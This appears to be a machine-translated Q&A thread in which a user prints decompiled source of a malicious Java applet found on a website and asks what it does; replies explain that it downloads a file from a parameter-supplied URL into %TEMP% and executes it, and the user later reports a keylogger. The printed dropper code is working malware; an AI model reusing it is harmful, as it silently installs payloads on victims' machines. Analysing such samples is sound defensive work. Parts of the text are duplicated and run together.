删除java键盘记录器,查看代码
我访问了这个网站[删除了有问题的网站名]以查看它的文件夹,使它看起来像一个小聊天室,在“/chat/trimsdy”中,它有一个自动运行的小java文件 我记不清了,但我可能不小心运行了数据包(接受它运行) 所以我所做的就是清除控制面板中的java缓存 然后我回到网站上,试图下载java.jar文件 我下载了它并下载了一个java de编译器,我已经反编译了java.jar文件 我这里有代码:删除java键盘记录器,查看代码,java,Java,我访问了这个网站[删除了有问题的网站名]以查看它的文件夹,使它看起来像一个小聊天室,在“/chat/trimsdy”中,它有一个自动运行的小java文件 我记不清了,但我可能不小心运行了数据包(接受它运行) 所以我所做的就是清除控制面板中的java缓存 然后我回到网站上,试图下载java.jar文件 我下载了它并下载了一个java de编译器,我已经反编译了java.jar文件 我这里有代码: import java.applet.Applet; import java.io.FileOutpu
import java.applet.Applet;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;
public class Java extends Applet
{
public void init()
{
String str1 = getParameter("jc9nvqlqnnd");
String str2 = System.getenv("TEMP");
String str3 = getParameter("ulztlykikct");
try {
FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
URL localURL = new URL(getParameter("gze82pwlo3e"));
URLConnection localURLConnection = localURL.openConnection();
InputStream localInputStream = localURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
int i;
while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1) {
localFileOutputStream.write(arrayOfByte, 0, i);
}
localInputStream.close();
localFileOutputStream.close();
Runtime localRuntime = Runtime.getRuntime();
localRuntime.exec(str2 + str1);
System.exit(0);
}
catch (IOException localIOException) {
System.exit(0);
}
}
}
你能帮我弄清楚它是干什么的吗我有点困惑
我可以看到它在TEMP中做了一些事情,但从他们的角度来看,我被卡住了
我有点不懂java,所以谢谢你的帮助
谢谢
雷布雷贝尔
编辑:
我浏览了页面上的html以查找applet参数,它所拥有的只是 这就是小程序中的所有代码 编辑:
感谢每一位提供帮助和建议的人 我想我很安全 再次感谢 雷布雷贝尔 编辑:
结果我确实运行了它,在我的%appdata%中发现它已将ccleaner.exe下载到我的appdata中,然后在一个名为java的文件中找到了我的击键列表!只有大约5分钟,因为我似乎记得结束了一个名为java或其他的进程。 我已经删除了ccleaner.exe和java文件
感谢搜索查找程序的一切
感谢大家的帮助,所以我没有记录太多的密钥。代码从URL下载一些内容,将其保存在
%TEMP%
文件夹中的某个位置,然后尝试执行它
参数通过加载小程序的HTML页面传递给小程序。查看从中下载的页面的HTML,您将在底部看到如下内容:
<applet width='0px' height='0px' code='Java.class' archive='Java.jar'>
<param name="gze82pwlo3e" value="http://url/omitted/in/case/its/bad">
<param name="jc9nvqlqnnd" value="CCleaner.exe">
<param name="ulztlykikct" value="">
</applet>
它下载一个脚本或程序,并将其写入文件,然后尝试执行该脚本或程序。要使用的名称在参数中指定。嗯,它下载一个文件并执行它。这里没什么可看的。您可能想知道jc9nvqqnnd
、ulztlykikct
和gze82pwlo3e
参数的值
现在在原来的网站上,它似乎下载了一个名为CCleaner.exe
的文件,大多数防病毒扫描程序都将其识别为Gen:Variant.Kazy.51365
但是,通常情况下,浏览器不应该执行Java文件。Java小程序通常不允许在没有特权的情况下下载和执行文件
那么,你真正的问题是什么呢?如果不知道它下载了什么,就无法知道它到底在做什么 这段代码基本上是在你的临时文件中写入一个文件,然后用。。。一些东西:
FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
URL localURL = new URL(getParameter("gze82pwlo3e"));
URLConnection localURLConnection = localURL.openConnection();
InputStream localInputStream = localURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
int i;
while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1) {
localFileOutputStream.write(arrayOfByte, 0, i);
}
localInputStream.close();
localFileOutputStream.close();
然后运行它刚刚编写的文件。
它是干什么的?取决于它在该文件上写了什么。如果不知道参数的值,就不可能确定,但它会在临时目录中打开一个文件,创建一个包含从任何URL检索的流内容的文件,并执行它;将其保存在用户的临时目录中,并执行。@JamesMontagne最好突出显示该网站会杀死你;如果没有链接,就没有办法为那些倾向于研究这个问题的人做任何研究。单击“编辑”,然后查看历史记录中的URL。顺便说一句,它从来不是完整的URL。问题是那里没有实际的URL,它是从applet参数读取的。行是
URL localURL=newurl(getParameter(“gze82pwlo3e”)代码>文件名也是一样。很抱歉,我是这样一个noob,但我该怎么做我该怎么找到applet参数show我能不能发现我只是知道如何反编译它们不在源代码中,但是在最初的网页中,我不认为它们存在,虽然我在进入网站之前禁用了java,所以我不知道结果是否已经改变了。不要使用浏览器查看它们,例如使用wget
或curl
加载URL。看Mat的回答,他也得到了。无论如何:Java部分不包含病毒。它只是一个普通.exe
文件的下载程序。哦,天哪,它确实存在!幸运的是,我不认为发生了什么事